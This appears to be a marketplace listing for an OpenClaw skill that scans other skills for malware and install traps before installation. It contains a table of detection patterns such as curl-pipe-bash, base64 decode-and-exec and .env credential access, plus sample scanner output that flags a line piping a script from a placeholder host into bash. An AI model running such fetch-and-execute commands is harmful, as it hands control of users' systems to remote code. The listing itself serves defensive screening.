Requirements
- Target platform
- OpenClaw
- Install method
- Manual import
- Extraction
- Extract archive
- Prerequisites
- OpenClaw
- Primary doc
- SKILL.md
Security scanner for OpenClaw skills. Detects malicious patterns, suspicious URLs, and install traps before you install a skill. Use before installing ANY sk...
Security scanner for OpenClaw skills. Detects malicious patterns, suspicious URLs, and install traps before you install a skill. Use before installing ANY sk...
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete.
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run.
Scan OpenClaw skills for malware, suspicious patterns, and install traps BEFORE installing them. Why this exists: In February 2026, security researchers found malware distributed through ClawHub skills. Skills can contain hidden install commands that download and execute malware. This scanner helps you catch them.
# Scan a skill before installing python3 scripts/claw-skill-guard/scanner.py scan https://clawhub.com/user/skill-name # Scan a local skill directory python3 scripts/claw-skill-guard/scanner.py scan ./skills/some-skill/ # Scan all skills in a directory python3 scripts/claw-skill-guard/scanner.py scan-all ./skills/
PatternRiskWhy It's Dangerouscurl | bash๐ด CRITICALExecutes remote code directlywget + execute๐ด CRITICALDownloads and runs binariesBase64/hex decode + exec๐ด CRITICALObfuscated malwarenpm install <unknown>๐ก HIGHCould install malicious packagespip install <unknown>๐ก HIGHCould install malicious packageschmod +x + execute๐ก HIGHMakes scripts executableUnknown URLs๐ก MEDIUMCould be malware stagingsudo commands๐ก MEDIUMElevated privileges.env file access๐ LOWCould steal credentials
$ python3 scanner.py scan https://clawhub.com/example/twitter-skill ๐ Scanning: twitter-skill โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ ๏ธ RISK LEVEL: HIGH ๐ Findings: ๐ด CRITICAL (1) โโ Line 23: curl -s https://xyz.example.com/setup.sh | bash โโ Executes remote script without verification ๐ก HIGH (2) โโ Line 45: npm install openclaw-core โ โโ Unknown package "openclaw-core" - not in npm registry โโ Line 52: chmod +x ./install.sh && ./install.sh โโ Executes local script after making it executable ๐ MEDIUM (1) โโ Line 67: https://unknown-domain.com/config โโ URL not in allowlist โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ RECOMMENDATION: DO NOT INSTALL Review the flagged lines manually. If you trust the author and understand what each command does, you can install with caution.
skills/claw-skill-guard/ โโโ SKILL.md # This file โโโ README.md # Setup & enforcement guide โโโ scripts/ โ โโโ scanner.py # The scanner โโโ patterns/ โ โโโ critical.json # CRITICAL risk patterns (block install) โ โโโ high.json # HIGH risk patterns (require approval) โ โโโ medium.json # MEDIUM risk patterns (review) โ โโโ low.json # LOW risk patterns (informational) โ โโโ allowlist.json # Known-safe URLs/packages โโโ examples/ โโโ agents-policy.md # Copy-paste for AGENTS.md โโโ pre-commit-hook.sh
Found a new attack pattern? Add it to patterns/suspicious.json and submit a PR. Stay safe out there. Trust but verify.
Identity, auth, scanning, governance, audit, and operational guardrails.
Largest current source with strong distribution and engagement signals.